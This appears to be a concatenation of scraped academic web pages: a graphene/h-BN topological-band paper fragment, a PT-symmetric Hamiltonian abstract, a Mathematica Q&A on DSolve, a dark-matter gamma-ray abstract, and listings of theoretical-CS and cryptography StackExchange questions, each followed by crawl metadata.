${H}_{h\text{-}BN}=-{t}_{2}\underset{〈i,j〉\alpha }{\sum }{C}_{i\alpha }^{†}{C}_{j\alpha }+\underset{i,\alpha }{\sum }{E}_{i}{C}_{i\alpha }^{†}{C}_{i\alpha }+\underset{i,\alpha }{\sum }{V}_{i}{C}_{i\alpha }^{†}{C}_{i\alpha }$ (2) Bernal堆叠石墨烯/h-BN异质结的哈密顿量为: $H={H}_{MLB}+{H}_{h\text{-}BN}+{t}_{\perp }\underset{i\in T,j\in B,\alpha }{\sum }\left({C}_{i\alpha }^{†}{C}_{j\alpha }+{C}_{j\alpha }^{†}{C}_{i\alpha }\right)$ (3) ${C}_{\alpha \beta }=\frac{1}{2\pi }\underset{n}{\sum }{\int }_{BZ}\text{d}{k}_{x}\text{d}{k}_{y}{\left({\Omega }_{xy}\right)}_{\alpha \beta }$ (4) ${\Omega }_{xy}=-\underset{{n}^{\prime }\ne n}{\sum }\frac{2\mathrm{Im}〈{\Psi }_{nk}|{v}_{x}|{\Psi }_{{n}^{\prime }k}〉〈{\Psi }_{{n}^{\prime }k}|{v}_{y}|{\Psi }_{nk}〉}{{\omega }_{n}-{\omega }_{{n}^{\prime }}}$ (5) Figure 1. (a) Schematic diagram of Bernal stacking zigzag-edged GBNNR. The bottom layer is h-BN layer and the top layer is graphene layer. y is the periodic direction and the x direction contains N = 80 sites. Green, yellow and blue solid circles represent N, B and C atoms, respectively; (b) Schematic diagram of graphene/h-BN heterojunction under local potentials.V1 and V2 are applied in the upper and lower half regions of the graphene layer respectively, and V3 and V4 are applied in the upper and lower half regions of the h-BN layer respectively 3. 结果与讨论 Table 1. Tight-binding parameters of graphene/h-BN heterojunctions calculated by density functional theory [28] (Unit of Energy: eV) Figure 2. (a) Band structure of GBNNR with zero local potential and ISOC; (b) Band gap of GBNNR ΔE as a function of V1 Figure 3. Left column is the band structure of GBNNR. The red and black curves represent the spin-up and spin-down energy bands respectively. The parameters are: λ = 0.02t1, (a) V1 = 0 eV; (c) V1 = 0.2 eV; (e) V1 = 1.2 eV. (b) The blue curve is the bandgap of the heterojunction under periodic boundary conditions, i.e. the bulk gap; the red curve is the GBNNR bandgap. (d) and (f) are the schematic diagrams of the probability distributions of edge states and the edge state propagation in (c), respectively Figure 4. (a) Band structure of GBNNR with λ = 0.02 t1, V4 = −3.665 eV. The red and black curves represent the spin-up and spin-down energy bands respectively. (b) and (c) are schematic diagrams of the probability distributions of edge states and the edge state propagation in (a), respectively 4. 结论 NOTES *通讯作者。 [1] Sarma, S.D., Adam, S., Hwang, E.H., et al. (2011) Electronic Transport in Two-Dimensional Graphene. Reviews of Modern Physics, 63, 407-470. https://doi.org/10.1103/RevModPhys.83.407 [2] Rutherglen, C., Jain, D. and Burke, P. (2009) Nanotube Electronics for Radiofrequency Applications. Nature Nanotechnology, 4, 811-819. https://doi.org/10.1038/nnano.2009.355 [3] Moon, P. and Koshino, M. (2014) Electronic Properties of Graphene/Hexagonal-Boron-Nitride Moiré Superlattice. Physical Review B, 90, Article ID: 155406. https://doi.org/10.1103/PhysRevB.90.155406 [4] N’Diaye, A.T., Bleikamp, S., Feibelman, P.J., et al. (2006) Two-Dimensional Ir Cluster Lattice on a Graphene Moiré on Ir(111). Physical Review Letters, 97, Article ID: 215501. https://doi.org/10.1103/PhysRevLett.97.215501 [5] Varchon, F., Feng, R., Hass, J., et al. (2007) Electronic Structure of Epitaxial Graphene Layers on SiC: Effect of the Substrate. Physical Review Letters, 99, Article ID: 126805. https://doi.org/10.1103/PhysRevLett.99.126805 [6] Sachs, B., Wehling, T.O., Katsnelson, M.I., et al. (2011) Adhesion and Electronic Structure of Graphene on Hexagonal Boron Nitride Substrates. Physical Review B, 84, Article ID: 195414. https://doi.org/10.1103/PhysRevB.84.195414 [7] Slotman, G.J., Wijk, M.V., Zhao, P.L., et al. (2015) Effect of Structural Relaxation on the Electronic Structure of Graphene on Hexagonal Boron Nitride. Physical Review Letters, 115, Article ID: 186801. https://doi.org/10.1103/PhysRevLett.115.186801 [8] Fan, Y., Zhao, M., Wang, Z., et al. (2011) Tunable Electronic Structures of Graphene/Boron Nitride Heterobilayers. Applied Physics Letters, 98, Article ID: 083103. https://doi.org/10.1063/1.3556640 [9] Sun, J., Xu, L. and Zhang, J. (2020) Electronic Structure and Transport Properties of Graphene/h-BN Controlled by Boundary Potential and Magnetic Field. Modern Physics Letters B, 34, Arti-cle ID: 2050180. https://doi.org/10.1142/S0217984920501808 [10] Li, X., Xu, L. and Zhang, J. (2020) Band Structure and Transport Property of Graphene/h-BN Heterostructure under Local Potentials. Chinese Journal of Physics (Taipei), 65, 75-81. https://doi.org/10.1016/j.cjph.2020.02.011 [11] Kane, C.L. and Mele, E.J. (2004) Quantum Spin Hall Effect in Graphene. Physical Review Letters, 95, Article ID: 226801. https://doi.org/10.1103/PhysRevLett.95.226801 [12] Kane, C.L. and Mele, E.J. (2005) Z2 Topological Order and the Quantum Spin Hall Effect. Physical Review Letters, 95, Article ID: 146802. https://doi.org/10.1103/PhysRevLett.95.146802 [13] Sheng, D.N., Weng, Z.Y., Sheng, L., et al. (2006) Quantum Spin Hall Effect and Topologically Invariant Chern Numbers. Physical Review Letters, 97, Article ID: 036808. https://doi.org/10.1103/PhysRevLett.97.036808 [14] Sheng, L., Sheng, D.N., Ting, C.S., et al. (2005) Nondissipative Spin Hall Effect via Quantized Edge Transport. Physical Review Letters, 95, Article ID: 136602. https://doi.org/10.1103/PhysRevLett.95.136602 [15] Prodan, E. (2009) Robustness of the Spin-Chern Number. Physical Review, 80, Article ID: 125327. https://doi.org/10.1103/PhysRevB.80.125327 [16] Sheng, L., Sheng, D.N. and Ting, C.S. (2005) Spin-Hall Effect in Two-Dimensional Electron Systems with Rashba Spin-Orbit Coupling and Disorder. Physical Review Letters, 94, Ar-ticle ID: 016602. https://doi.org/10.1103/PhysRevLett.94.016602 [17] Andrei Bernevig, B. and Zhang, S.-C. (2006) Quantum Spin Hall Effect. Physical Review Letters, 96, Article ID: 106802. https://doi.org/10.1103/PhysRevLett.96.106802 [18] Xu, L., Zhou, Y. and Gong, C.D. (2013) Topological Phase Transition Induced by Spin-Orbit Coupling in Bilayer Graphene. Journal of Physics Condensed Matter, 25, Article ID: 335503. https://doi.org/10.1088/0953-8984/25/33/335503 [19] Ren, Y., Qiao, Z. and Niu, Q. (2016) topological Phases in Two-Dimensional Materials: A Review. Reports on Progress in Physics Physical Society, 79, Article ID: 066501. https://doi.org/10.1088/0034-4885/79/6/066501 [20] Chen, T.W., Xiao, Z.R., Chiou, D.W., et al. (2011) High Chern Number Quantum Anomalous Hall Phases in Single-Layer Graphene with Haldane Orbital Coupling. Physical Review B, 84, Article ID: 165453. https://doi.org/10.1103/PhysRevB.84.165453 [21] Wang, E., Lu, X., Ding, S., Yao, W., Yan, M., Wan, G., et al. (2016) Gaps Induced by Inversion Symmetry Breaking and Second-Generation Dirac Cones in Graphene/Hexagonal Boron Nitride. Nature Physics, 12, 1111-1115. https://doi.org/10.1038/nphys3856 [22] Yang, W., Chen, G., Shi, Z., Liu, C.-C., Zhang, L., Xie, G., et al. (2013) Epitaxial Growth of Single-Domain Graphene on Hexagonal Boron Nitride. Nature Materials, 12, 792-797. https://doi.org/10.1038/nmat3695 [23] Gorbachev, R.V., Song, J.C.W., Yu, G.L., Kretinin, A.V., Withers, F., Cao, Y., et al. (2014) Detecting Topological Currents in Graphene Superlattices. Science, 346, 448-451. https://doi.org/10.1126/science.1254966 [24] Den Nijs, M. (1984) Quantized Hall Conductance in a Two Dimen-sional Periodic Potential. Physica A: Statistical Mechanics and Its Applications, 124, 199-210. https://doi.org/10.1016/0378-4371(84)90239-5 [25] Kohmoto, M. (1985) Topological Invariant and the Quantiza-tion of the Hall Conductance. Annals of Physics, 160, 343-354. https://doi.org/10.1016/0003-4916(85)90148-4 [26] Hatsugai, Y. (1993) Chern Number and Edge States in the Integer Quantum Hall Effect. Physical Review Letters, 71, 3697-3700. https://doi.org/10.1103/PhysRevLett.71.3697 [27] Chang, M.C. and Niu, Q. (1995) Berry Phase, Hyperorbits, and the Hofstadter Spectrum. Physical Review Letters, 75, 1348-1351. https://doi.org/10.1103/PhysRevLett.75.1348 [28] Slawinska, J., Zasada, I., Kosinski, P., et al. (2010) Reversible Modifications of Linear Dispersion: Graphene between Boron Nitride Monolayers. Physical Review B: Condensed Matter, 82, Article ID: 085431. https://doi.org/10.1103/PhysRevB.82.085431
2023-03-24 06:08:55
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 45, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.556305468082428, "perplexity": 9050.221023930715}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945248.28/warc/CC-MAIN-20230324051147-20230324081147-00167.warc.gz"}
http://ptsymmetry.net/?m=20130103
January 2013 Mon Tue Wed Thu Fri Sat Sun « Dec   Feb » 123456 78910111213 14151617181920 21222324252627 28293031 PT-Symmetric Hamiltonian Model and Dirac Equation in 1+1 dimensions O. Yesiltas In this article, we have introduced a $$\mathcal{PT}$$-symmetric non-Hermitian Hamiltonian model which is given as $$\hat{\mathcal{H}}=\omega (\hat{b}^{\dagger}\hat{b}+1/2)+ \alpha (\hat{b}^{2}-(\hat{b}^{\dagger})^{2})$$ where $$\omega$$ and $$\alpha$$ are real constants, $$\hat{b}$$ and $$\hat{b^{\dagger}}$$ are first order differential operators. The Hermitian form of the Hamiltonian $$\mathcal{\hat{H}}$$ is obtained by suitable mappings and it is interrelated to the time independent one dimensional Dirac equation in the presence of position dependent mass. Then, Dirac equation is reduced to a Schr\”{o}dinger-like equation and two new complex non-$$\mathcal{PT}$$-symmetric vector potentials are generated. We have obtained real spectrum for these new complex vector potentials using shape invariance method. We have searched the real energy values using numerical methods for the specific values of the parameters. http://arxiv.org/abs/1301.0205 Mathematical Physics (math-ph); Quantum Physics (quant-ph)
2019-02-18 10:19:46
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6356532573699951, "perplexity": 830.2450264833883}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-09/segments/1550247484928.52/warc/CC-MAIN-20190218094308-20190218120308-00292.warc.gz"}
https://mathematica.stackexchange.com/questions/89823/transform-a-vector-de-into-a-set-of-scalar-des
# Transform a vector DE into a set of scalar DEs [closed] I have the vector equality: {{a,b},{c,d}}.D[{x1[t],x2[t]},t]=={{e,f},{g,h}}.{u1[t],u2[t]} I want to solve this using DSolve. How do I transform the above vector equality into a list of 2 scalar equalities (automatically): {a*x1'[t]+b*x2'[t]==e*u1[t]+f*u2[t], c*x1'[t]+d*x2'[t]==g*u1[t]+h*u2[t]} How do I do this? Thanks! • Thread[] ought to work. – J. M.'s discontentment Aug 3 '15 at 16:06 • @Guesswhoitis. Awesome, Thread[LHS==RHS] (pseudocode) worked! – space_voyager Aug 3 '15 at 16:10 • In recent versions of Mathematica, you do not have to transform the vector equation into a pair of scalar equations before using solving them. Thus DSolve[{{a, b}, {c, d}}.D[{x1[t], x2[t]}, t] == {{e, f}, {g, h}}.{u1[t], u2[t]}, {x1[t], x2[t]}, t] works just fine as is, whether with "abstract" functions u[t], u2[t] and symbolic coefficient matrices, or with specific functions and actual values in the coefficient matrices. – murray Aug 3 '15 at 16:18 • @SjoerdC.deVries can you provide a link please? – chris Aug 4 '15 at 6:48 • @chris It was rather difficult to find, but I believe I was alluding to this question. – Sjoerd C. de Vries Aug 4 '15 at 10:36
2020-09-18 19:43:01
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4547494649887085, "perplexity": 3049.576381079729}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-40/segments/1600400188841.7/warc/CC-MAIN-20200918190514-20200918220514-00278.warc.gz"}
https://infoscience.epfl.ch/record/185753
Infoscience Journal article # Diffuse gamma-ray constraints on dark matter revisited I: the impact of subhalos We make a detailed analysis of the indirect diffuse gamma-ray signals from dark matter annihilation in the Galaxy. We include the prompt emission, as well as the emission from inverse Compton scattering whenever the annihilation products contain light leptons. We consider both the contribution from the smooth dark matter halo and that from substructures. The main parameters for the latter are the mass function index and the minimal subhalo mass. We use recent results from N-body simulations to set the most reasonable range of parameters, and find that the signal can be boosted by a factor ranging from 2 to 15 towards the Galactic poles, slightly more towards the Galactic anticenter, with an important dependence on the subhalo mass index. This uncertainty is however much less than that of the extragalactic signal studied in the literature. We derive upper bounds on the dark matter annihilation cross section using the isotropic gamma-ray emission measured by Fermi-LAT, for two directions in the sky, the Galactic anticenter and the Galactic pole(s). The former represents the lowest irreducible signal from dark matter annihilation, and the latter is robust as the astrophysical background, dominated by the hadronic contribution, is rather well established in that direction. Finally, we show how the knowledge of the minimal subhalo mass, which formally depends on the dark matter particle interactions with normal matter, can be used to derive the mass function index.
2017-03-25 18:41:18
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8048422932624817, "perplexity": 634.8091763059939}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-13/segments/1490218189031.88/warc/CC-MAIN-20170322212949-00639-ip-10-233-31-227.ec2.internal.warc.gz"}
http://cstheory.stackexchange.com/questions
# All Questions 3 views ### Identifying ambiguities in inductively learned concepts I'm looking at ways in which "ambiguities" can be identified in labeled training data by a system undergoing some sort of inductive learning process. Do you know if there is any literature on this ... 4 views ### Can we verify satisfiability of first order statements via saturation in sub-exponential time? In first order logic, we can prove satisfiability several ways: Finite model generation, truthful monadic abstractions, and also saturation. With finite model generation techniques, we can verify the ... 13 views ### Bisection Width of a Mesh Topology What is the bisection width of a q-dimensional mesh topology with one dimension having k nodes, where bisection width splits the network as evenly as possible into two sets (with a difference of at ... 22 views ### Alternating tree automata for arbitrary arity tree Could alternating tree automata be used for recognizing set (language) of arbitrary-arity trees? More specifically, as an example: let $\Sigma = \{a,b,c\}$ - labels for tree nodes. Trees from $T$ ... 23 views ### example for context free language which satisfy the pumping lemma [on hold] I'm a beginner to Automata Theory. I found this interesting topic pumping lemma. I know to prove a language is not a context free using pumping lemma. But I didn't found any example for context free ... 33 views ### Quantum Computing & Ray Tracing Rendering Engines As a non-expert in any of these fields, but out of interest, I have been looking into basic concepts of quantum computing. And I was wondering, taking the concept of ray tracing and rendering engines, ... 46 views ### Time complexity of a branching-and-bound algorithm Theoretical computer scientists usually use branch-and-reduce algorithms to find exact solutions. The time complexity of such a branching algorithm is usually analyzed by the method of branching ... 30 views ### Karp reduction/many-one reduction [on hold] Why is Karp reduction also called "many-one reduction"? What do the 'many' and the 'one' stand for? I tried looking at wikipedia and read some books but I did not find any explantion. I do understand ... 40 views ### Logics for timed resource control I'm studying proof theory and I've seen that linear logic can be used as a way to control resource usage, since by the propositions-as-types it is equivalent to the linear lambda calculus. Is there a ... 45 views ### Numerical eigenbasis for a unitary Do you know what numerical software computes an eigenvector basis for a unitary matrix? Say I have a unitary matrix $U$. If its eigenvalues are simple (no multiplicities), then for instance Matlab ... 32 views ### How and why does Recrypt function works? The general aproach presented by Craig Gentry in 2009 to create a fully-homomorphic encryption system is roughly the follow: Create a scheme that can evaluate some functions (increasing the noise in ... 36 views ### How many maximization algorithms can we run at the same time on a simple (or super) computer? [on hold] I have a maximization problem which consists of finding the max of $2^L$ elements. This can be done in $O(2^L)$. This problem can be decomposed into $L$ maximization problems, where solving problem ... 72 views ### Quantum algorithms for QED computations related to the fine structure constants My question is about quantum algorithms for QED (quantum electrodynamics) computations related to the fine structure constants. Such computations (as explained to me) amounts to computing Taylor-like ... 119 views ### “Snake” reconfiguration problem While writing a small post on the complexity of the videogames Nibbler and Snake; I found that they both can be modeled as reconfiguration problems on planar graphs; and it seems unlikely that such ... 85 views ### Recognizing sequences sortable by transpositions? While reading the post, Probability of generating a desired permutation by random swaps, by Scott, I got interested in this problem of sorting: Input: a sequence $A$ of $2N$ positive integers. ... 288 views ### How could God authenticate in one message? Thought experiment: Which data could convince experts, beyond reasonable doubts, about their origin outside our universe? From which margin should an expert consider such claim seriously? For ... 191 views ### Counting occurences of 'a' in a book faster than O(n)? [on hold] I was asked the following question in an interview: How would you count the occurrences of character a in a 500-page book? For simplicity, assume that you are ... 47 views ### Low-degree testing in PCP Theorem using bivariate polynomials I read about modifications of the low-degree test used in the (first) proof of the PCP theorem. The test used in the proof works over randomly chosen lines while modifications allow choosing random ... 123 views ### Pseudorandom generator for finite automata Let $d$ be a constant. How can we provably construct a pseudorandom generator that fools $d$-state finite automata? Here, a $d$-state finite automata has $d$ nodes, a start node, a set of nodes ... 86 views ### Recommendations for References on undecidability of First Order Logic I am currently reading Computability and Logic by Boolos Burgess Geoffrey for the proof on "undecidability of first order logic". however, I find the notations a bit confusing. Can anyone recommend ... 136 views +50 ### Lower bound on estimating $\sum_{k=1}^n a_k$ for non-increasing $(a_k)_k$ I'd like to know (related to this other question) if lower bounds were known for the following testing problem: one is given query access to a sequence of non-negative numbers $a_n \geq \dots\geq a_1$ ... 64 views ### Is there notation for converting a multi-set to a set? Suppose we have a multi-set $S$. For example, $S = \{ 1,2,2,3 \}$. Suppose we also have a set $T$, e.g., $T=\{1,2,3\}$. I would like to say, compactly, that $S$, when its duplicates are removed, is ... 45 views ### Discrepancy of Hadamard type matrix Let $H$ be $\{-1,+1\}$ Hadamard matrix of size $2$ and $J$ be the same size all $1$ matrix. Let $W$ be $\frac{H+J}{2}$. Is the discrepancy of $W^{\otimes k}$ atmost $\sqrt{k^{-1}}$? 120 views ### Subset sum solver. Worth continue working on this method? [on hold] I have been working in a subset sum problem solver for some time. The implementation is an exact/exhaustive search solver. The variable determining the asymptomatic growth rate is just $N$ (the ... 34 views ### Total number of spanning trees of a set of graphs with constraint This is an extension of the question "Total number of spanning trees of a set of graphs". The original problem has been shown to be #P-complete. Now a new constraint is added to the problem. I have ... 23 views ### What is the relationship between regular, context free and computable language? [on hold] Is there a diagram illustrating their relationships? 23 views ### Quick question: What does it mean for a language to be “recognized” by an automaton? [on hold] I am not particularly familiar with the usage of "recognized" in English, can explain what this means for a language be recognized by an automaton? Does it mean that the NFA, DFA, Pushdown or Turing ... 312 views ### Does $NP$-hardness of $c$-approximation (for some $c>1$) imply $APX$-hardness? Assume that for a given minimization problem with only integer solutions, it is $NP$-hard to decide if the optimal solution is 5 or 6. I.e., a polynomial-time algorithm with an approximation ratio ... 23 views ### Concept of 'shape' in clustering Is there any abstract definition for 'shapes' of a cluster? I am currently working on providing for a set of axioms to study clustering. In my work, I have found a need for an abstract definition for ... 53 views ### What are the major research issues in distributed transactions? Background: Transaction processing has been a traditional research topic in database theory. Nowadays distributed transactions are popularized by the large-scale distributed storage systems which ... 73 views ### Maximum weight “fair” matching I'm interested in a variant of the maximum weight matching in a graph, which I call "Maximum Fair Matching". Assume that the graph is full (i.e. $E=V\times V$), has even number of vertices, and that ... 30 views ### Implementation of Min Max Matching in Christofides algorithm for approximating TSP How is the corresponding step of finding the minimum-cost perfect matching on the odd-degree nodes is supposed to be implemented? The induced graph is not bipartite and all the algorithms I know for ... 81 views ### Examples of open problems solved through application of a theorem already known Are there good examples of reasonable open problems in TCS that had an 'obvious' solution via application of a theorem found in mathematics probably found a few decades earlier but went unnoticed in ... 191 views ### Can typed lambda calculi express *all* algorithms below a given complexity? I know that the complexity of most varieties of typed lambda calculi without the Y combinator primitive is bounded, i.e. only functions of bounded complexity can be expressed, with the bound becoming ... 38 views ### Are (empirical) Rademacher complexity always positive? Rademacher complexity and empirical Rademacher complexity are used to provide upper bound on the loss of solving an learning problem. That seems to imply that Rademacher complexity and empirical ... 55 views ### Is there a purely functional vector with O(1) access to the front and back but O(log n) concatenation? Context: For fun and perhaps for actual use, I'm making my own programming language that would compile to Typed Racket, a statically-typed Lisp dialect. One of the major features I want to implement ... 45 views The famous FTPL algorithm [1] is analyzing linear cost function. Is there any generalized proof for nonlinear functions known? Note that in the last paragraph of [1] it says "It would be great to ... 12 views ### determing the max flow with only edge capacities from n/w with additional vertex capacities? Let ((V, E); s, t; c) be an extended flow network where not only edge capacities, but also vertex capacities are constrained, i. e., c : E ∪ V → R^ + 0 and a flow f : E → R^ + 0 must satisfy, in ... 33 views ### FPTAS for bin packing If an algorithm for bin packing has a guarantee of OPT(I)+log^2(OPT(I)), then there is a fully polynomial approximation scheme for this problem. I have to prove this statement, but I have no idea ... 218 views ### Finding a permutation $p$ of $x_1, x_2, \dots, x_n$ which maximises $\sum_{i=1}^{n-1}|x_{p_{i+1}}-x_{p_i}|$ Here is the algorithmic problem I'm trying to solve: Given a list of integers $x_1, x_2, \dots, x_n$ find a permutation $p_1, p_2, \dots, p_n \in [n]$ that maximises the sum ... 69 views ### What is known about matrix multiplication, and matrix circuits? So I'm wondering, first off, where I can read up to get a feel for state-of-the-art matrix multiplication concepts. I'll try to be more specific: I'm wondering if there has been research on circuits ... 81 views ### Known algorithms for Graph isomorphism [closed] What algorithms are known for the graph isomorphism problem? Can those algorithms be related to algorithms for other graph theoretical problems (e.g. subgraph problem, counting graph isomorphisms)? 103 views ### The relationship between QCMA and QMA in the Turing and Communication model First my background about computational complexity is still beginner. Recent paper published by Klauck and Podder [KP14] show that for the first time an exponential gap between computing partial ... 57 views ### What is the state of the art research in analysing algorithms on GPU architectures? I have found many papers on sequential algorithms that have been implemented and tested on GPU architectures. Each of these papers usually as a result contains the amount of speedup that was achieved ... 46 views ### Is Software Consist Weight [closed] i am confuse about that Is software consist Weight or not? Regards, Arif 29 views ### Pygame Countdown time [closed] Can anyone help me with creating a timer in pygame? I have a game where I would could like to have a timer for someone to complete the game. this is what I have def countdown(countdown): for t ... 20 views ### Rate of convergence of graph-theoretic quantity to fractional graph-theoretic counterpart Let $G^n$ denote the OR product of a graph with itself $n$ times, i.e. the graph which has an edge between distinct vertices $(v_1,v_2,\ldots,v_n)$ and $(u_1,u_2,\ldots,u_n)$ if there exists some $i$ ... 84 views ### What is the worst-case runtime complexity to transform a NFA to DFA via Rabin-Scott's power set construction? What is the worst-case runtime complexity to transform a NFA to DFA via Rabin-Scott's power set construction? Why? Details: http://en.wikipedia.org/wiki/Powerset_construction states that the ... I aim to solve the following puzzler I recently read: A toymaker is faced with a group of $|A|$ buyers for their stock of $|B|$ distinct toys. Each buyer can buy up to 3 toys if available for buying. ...
2014-12-19 06:28:28
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9192473888397217, "perplexity": 1076.1667614426208}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-52/segments/1418802768276.101/warc/CC-MAIN-20141217075248-00068-ip-10-231-17-201.ec2.internal.warc.gz"}
http://crypto.stackexchange.com/questions?page=18&sort=faq
# All Questions 254 views ### How feasible is word-level frequency analysis over English (or any language)? Say I have some black box which, given any English word, deterministically outputs a token for that word. Assume our black box is implemented using strong cryptography, i.e. the hardness of reversing ... 152 views ### Test Vectors for ciphers While implementing ciphers (/hash functions, ...), I often face this problem: Where to find test vectors for it; so that I can guarantee my program is correct. It is generally a tedious job to find ... 292 views ### True Random Number Generator by milliseconds per keystroke (TRNG-Kms) The simplest way to generate truly random numbers for OTP keys is to measure the time in milliseconds between each keystroke on a keyboard. The randomness depends on the user typing in various speeds. ... 125 views ### Associative standard cryptographic hash function I am looking for a standard hash function which satisfies the following property: A hash function $H(a,b) = F(h(a),h(b))$ with $h$ (within $F$) any standard cryptographic hash function and $F$ an ... 208 views ### Using PBKDF2 twice with different argument order I'm pretty sure this is a really bad approach (in theory), but one of my clients is doing this and I was wondering… How bad it is to perform pbkdf-2 in this way (with 2000 iterations)? ... 197 views ### What differences between Menezes–Vanstone ECC and ElGamal ECC? After researching ECC encryption, I found that we can use ElGamal cryptosystem with elliptic curve and can we use Menezes-Vanstone cryptosystem with elliptic curve. What is the essential difference ... 172 views ### When is it safe to not use authenticated encryption? I have read the post Why should I use Authenticated Encryption instead of just encryption? When is it safe to not use authenticated encryption? I assumed hard drive volume encryption or per file ... 163 views ### Is there a flaw in this ECC blind signature scheme? Recently I've found the following work on the internet: An ECC-Based Blind Signature Scheme The paper claims to be an ECDSA blind signature however it seems that their scheme has a flaw in it. The ... 88 views ### Does $i^n=j^n$ for $i, j \in GF(2^q)$ and $i \neq j$ for some $n<2^q-1$ Let $i, j \in GF(2^q)$ and $i \neq j$ and $i,j\neq0$. Is that possible that $i^n=j^n$ for some $n$ such that $0 < n < 2^q-1$? I am looking for a proof if the answer is no, or for a method to ... 256 views Trying to find related answer for a long time, but not convinced yet. What I am trying is to encrypt using RijndaelManaged. To create Key, I am passing password, ... 300 views ### Making my steganography code more hard to detect and crack I'm doing a college project about digital image steganography on MATLAB. So far i've been able to get the help i needed from cool guys on stackoverflow but i now need to make my algorithm more hard to ... 169 views ### How to attack this authentication protocol from “Cryptography: An introduction” Consider the following protocol (from the book "Cryptography: An introduction", by Nigel Smart): ... 312 views Consider the pairing $e: G_1*G_2 \to G_t$. Why we are mapping element from group $G_1$ and group $G_2$ to an element in $G_t$. How are they used in cryptography? What advantages do they provide? 416 views ### DES — Can I recover the key when I have both ciphertext and the plaintext? Given a message and DES encrypted form of said message, is it possible to efficiently compute the key used to encrypt the data? 163 views 448 views ### AES block cipher modes of operation have a project in which I have to implement an en/de-cryption structure using a standard AES block of 128-bits in VHDL and I think I'm a bit confused. So I'd like to ask some questions about AES and ... 416 views ### Making counter (CTR) mode robust against application state loss Counter (CTR) mode, which is a block cipher mode of operation, has some desirable qualities (no padding, parallel encryption and decryption), but at the cost of failing badly when non-unique counter ... 250 views ### Reordering non-block-aligned parts with DES in ECB mode I was given a ciphertext file which was encrypted using DES in ECB mode. It is known that the plainttext that was encrypted has the following form: Each line of text consists of a payroll followed ... 477 views ### Where is the S-Box generated in Rijandel/AES? It's rather kind of lame questions, and I can't find good and clear explanation: In which step of Rijandel is S-box generated? Is the S-box reused in every round of cipher or is generated in every ... 797 views ### 